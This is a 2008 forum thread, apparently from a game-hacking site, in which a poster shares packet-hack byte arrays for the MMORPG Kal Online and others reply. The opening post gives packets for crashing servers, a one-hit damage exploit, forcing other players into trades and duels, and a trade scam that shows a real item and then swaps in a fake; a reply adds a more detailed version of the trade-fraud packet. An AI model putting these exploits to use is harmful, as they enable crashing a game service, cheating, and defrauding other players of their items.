|
You last visited: Today at 14:51
Advertisement
[RELEASE] Tutorial of Packet hacks.
Discussion on [RELEASE] Tutorial of Packet hacks. within the Kal Online forum part of the MMORPGs category.
09/05/2008, 23:39
|
#1
|
elite*gold: 0
Join Date: Apr 2007
Posts: 228
Received Thanks: 222
|
[RELEASE] Tutorial of Packet hacks.
Hello... this is a small Tutorial how you do some hacks with packets. that aren't all but to lazy for do the rest.
Animation Overflow. ( Int & Prv )
here i show you how to overflow the animations
example ( works only with IC'S )
PHP Code:
BYTE ani_BR[] = {0x2d, playerid};
BYTE ani_CD[] = {0x29, playerid};
BYTE ani_PN[] = {0x13, playerid};
BYTE ani_CD[] = {0x29, playerid};
repeat it and you will get lights like this
1hit Hack. ( Int & Prv )
see see i posted it some days ago it works on Int but not on high mobs d2 works , d3 till fl6 , emok i dunno
on psrv's it work's too you need just to make more times the procedure
PHP Code:
PRV & INT,
let be equiped your weapon. !!!! [ VERY IMPORTANT ]
BYTE MIX[] = {0x62, G40weap, Armor, Weapon, medicine, money};
after succeed change ur weapon to a new clean G40 and do again
PHP Code:
BYTE MIX[] = {0x62, G40weap, Armor, Weapon, medicine, money};
just repeat this produce like 5 times ( int ) and on ( prv, like 15 times )
hf
Server Crashs. ( Int & Prv )
here there are 2 ways one works only for prv and other for both.
PHP Code:
PRV ONLY,
BYTE CrashPRV[] = {0x62, weapon1, weapon1, armor, medicine, money, 0x80};
when the mix succeed then is too the server crashed.
Here is the second Server Crash
sandro wished to delete this one so EDITED...
Tradehack ( Int & Prv )
here i show you how to fake and setup real item,
example
PHP Code:
PRV & INT, (I T E M) (SLOT)
BYTE REAL[] = {0x1c, 0x01, 0x20, 0x00, 0x00, 0x80, 0x01, 0x00, 0x00, 0x00};
BYTE FAKE[] = {0x1c, 0x01, 0x20, 0x00, 0x00, 0x80, 0x02, 0x00, 0x00, 0x00};
First You send the real one the slot is then 0x01 (see SLOT)
then you need to send just the same packet except the slot
change it to slot2 YOU SEE IT IN THE EXAMPLE.
Forces. ( Int & Prv )
well with this one you can force into pt's , duels , trades , and student mode.
PHP Code:
PRV & INT,
BYTE AskToTrade[] = {0x23, 0x01, playerid};
BYTE AskToParty[] = {0x2d, 0x01, playerid};
BYTE AskToDuel[] = {0x51, 0x01, playerid};
BYTE AskToStudent[] = {0x55, 0x01, playerid};
have fun.
Pimp function. ( Int & Prv )
fine fine now to the how to pimp.
COMBO VARIANT.
PHP Code:
PRV & INT,
BYTE PIMP[] = {0x39, poly_w, 0x39, tali_w};
that was it just repeat it.
NORMAL VARIANT.
PHP Code:
PRV & INT,
BYTE UseP[] = {0x39, Poly, weapon};
BYTE UseT[] = {0x39, Tali, weapon};
that was it just repeat it.
Storm Hack ( Prv )
here the stormhack how to. ( mage only Hermit )
PHP Code:
PRV ONLY,
BYTE STORM[] = {0x10, 0x2b, x, y};
i dont tell you how to get coordinates maybe in other tutorial.
Rush ride =) ( Int & Prv )
ya one that i loved the rush ride  ( knight only VAGA )
PHP Code:
AID = MonsterID, PlayerID, NpcID;
BYTE RUSH[] = {0x2b, 0x15, AID};
that was the Rush ride.
Send Mix. ( Int & Prv
here the packet mixing.
PHP Code:
PRV & INT,
BYTE MIX[] = {0x62, RealWeap, Armor, Weapon, medicine, money};
ok that was the packet mixing....
there are many left but like i said was to lazy some missing where i was feeling that they don't need like
Perfect Reset ( reset all skills for free )
Mage client crash etc...
|
|
|
09/05/2008, 23:41
|
#2
|
elite*gold: 0
Join Date: Apr 2007
Posts: 150
Received Thanks: 91
|
Yah np on letting you use my server etc. XD
|
|
|
09/06/2008, 00:00
|
#3
|
elite*gold: 60
Join Date: Jan 2008
Posts: 193
Received Thanks: 21
|
Very nice post, now i do need how to figure out the way to send m *evil laugh*
|
|
|
09/06/2008, 00:07
|
#4
|
elite*gold: 0
Join Date: Jan 2008
Posts: 241
Received Thanks: 22
|
realy great thnks haha some i didnt know :P woohoo :P ty
|
|
|
09/06/2008, 00:08
|
#5
|
elite*gold: 60
Join Date: Jan 2008
Posts: 193
Received Thanks: 21
|
Zadkine
edit
|
|
|
09/06/2008, 01:37
|
#6
|
elite*gold: 20
Join Date: Apr 2008
Posts: 820
Received Thanks: 177
|
thx but useless for the most, nearly no1 here have a packet sender ( except u, bloodx and some other persons)
|
|
|
09/06/2008, 01:39
|
#7
|
elite*gold: 60
Join Date: Jan 2008
Posts: 193
Received Thanks: 21
|
chibis is right:P plz release it or give tut/hints lol
|
|
|
09/06/2008, 01:41
|
#8
|
elite*gold: 20
Join Date: Apr 2008
Posts: 820
Received Thanks: 177
|
i dont think that any1 here will post a working packet sender, so try to learn to write ur own, what sounds impossible for us "noobs"^^
|
|
|
09/06/2008, 01:54
|
#9
|
elite*gold: 60
Join Date: Jan 2008
Posts: 193
Received Thanks: 21
|
yep lol i should have had choosed for programmer instead of truck driver xD
|
|
|
09/06/2008, 02:58
|
#10
|
elite*gold: 0
Join Date: Sep 2007
Posts: 35
Received Thanks: 3
|
Nice
The trade hack I do a little differently, although I cant fully understand what you mean in your example so might be the same
the format of packet 0x1C is [num items to trade (1byte), [item id(4bytes), count(4bytes)], ...(list of item-count pairs)]
so, submit the first 0x1C packet containing any number of times (real packet)
[0x1c, 0x02, 0xaa, 0xaa, 0xaa, 0xaa, 0xbb, 0xbb, 0xbb, 0xbb, 0xcc, 0xcc, 0xcc, 0xcc, 0xdd, 0xdd, 0xdd, 0xdd]
a is item 1 id, b is item 1 count, c is item 2 id, d is item 2 count.
now submit the packet again, except with the first item being invalid (fake packet)
[0x1c, 0x03, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xaa, 0xaa, 0xaa, 0xaa, 0xbb, 0xbb, 0xbb, 0xbb, 0xcc, 0xcc, 0xcc, 0xcc, 0xdd, 0xdd, 0xdd, 0xdd]
(i.e. the id and count of the first item are 0)
Other person sees items from first packet, but second packet invalidates the trade ^^
|
|
|
09/06/2008, 06:40
|
#11
|
elite*gold: 0
Join Date: Mar 2007
Posts: 206
Received Thanks: 25
|
thanks... =] though only the rush ride and crashing with mix is new to me =]
|
|
|
09/06/2008, 09:20
|
#12
|
elite*gold: 0
Join Date: Aug 2007
Posts: 475
Received Thanks: 107
|
krasser scheiß^^
ich glaube ich muss mich ma anstrengen nen packet sender zu machen...
also leute..see ya all in 10 jahren oder so xD
|
|
|
09/06/2008, 09:32
|
#13
|
elite*gold: 0
Join Date: Sep 2007
Posts: 61
Received Thanks: 7
|
boooring and ooolllldddddd aaaaahhh
but if you can show this packet :
i know its portable bomb , but i cant check this becouse i cant be on scenario 3-2 ...
and i think movehack its 0x15- stop and fast walk or tp. i dk it atm.
i think on globalserver its can work.
|
|
|
09/06/2008, 10:42
|
#14
|
elite*gold: 0
Join Date: Apr 2007
Posts: 228
Received Thanks: 222
|
ofc it's old lol i did it for like 2years ROFL. but no i dont show you how i made the bombardemont  that will be a secret :P
|
|
|
09/06/2008, 10:45
|
#15
|
elite*gold: 0
Join Date: Sep 2007
Posts: 61
Received Thanks: 7
|
i know how, eXteco know too. but i havent packet its like cannon on war, working on glob exteco can run it , server srash is too easy on glob without mixshits and atc , ask eXteco if you need
|
|
|
 |
|
Similar Threads
|
[Tutorial] Basic Packet Hacking
12/23/2017 - Coding Tutorials - 100 Replies
Basic Packet Hacking
In diesem kleinen Tutorial, will ich euch zeigen wie man Packete snifft, analysiert und editiert.
#Inhalt:
-]Voraussetzungen & Programme
|
Packet Bot Tutorial?
07/13/2010 - General Coding - 3 Replies
I've did a little C++ as well as C# and I consider myself good in Python. I'm looking into making a proxy bot for the browser game Evony. So far, I have found no tutorials for programming such a thing for any game.
I have no idea on how to start network programming. If anyone has a tutorial or an open source bot you could link me to, I would greatly appreciate it.
Thanks,
NETio
|
[Suche] Packet editor TuTorial
03/26/2010 - AutoIt - 10 Replies
Hallo
Ich bin auf der suche nach einen guten PE code für autoit..
Leider habe ich nichts gefunden und deswegen frage ich hier; Gibst da ein paar leute die so einen code kennen?
MFG
CocaCocain
|
Frage: Packet Hack Tutorial?
12/14/2009 - Kal Online - 11 Replies
Gibt es ein PACKET HACK Tutorial?Habe vorhin jmd gesehen der als archer 1hit gemacht hat,er meinte das geht mit packet hack...gibt es ein tutorial?Danke im vorraus
|
Packet Tutorial
05/22/2006 - Conquer Online 2 - 3 Replies
I dont seem to find a good tutorial about Packets. If someone could make one DECENTLY, or point me heh i'll b glad to provide many many packed-based tools. Also i'd like to have the packet sender/logger source code.
Thats it =)
text2schild.php?smilienummer=1&text=Don't you guys get mad because I'm doig a request here, this is the most readed section of ConquerOnline EPVP Forum so I'm kinda forced to post here, but if you guys want to move it to the right section feel free =) no hard...
|
All times are GMT +1. The time now is 14:51.
|
|